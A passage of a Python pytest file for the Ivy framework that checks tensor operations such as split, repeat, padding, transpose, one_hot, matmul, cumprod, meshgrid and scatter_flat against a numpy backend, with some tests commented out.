assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
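# one_hot appends a trailing dimension of size `depth` to the index shape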
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
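# exclusive=True is expected to shift the running product along the axis by one,
# prepending a 1 and dropping the final product (TensorFlow-style exclusive scan)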
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
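# 'xy' (Cartesian) indexing swaps the first two dimensions relative to 'ij'
# (matrix) indexing, hence the shape adjustment below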
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
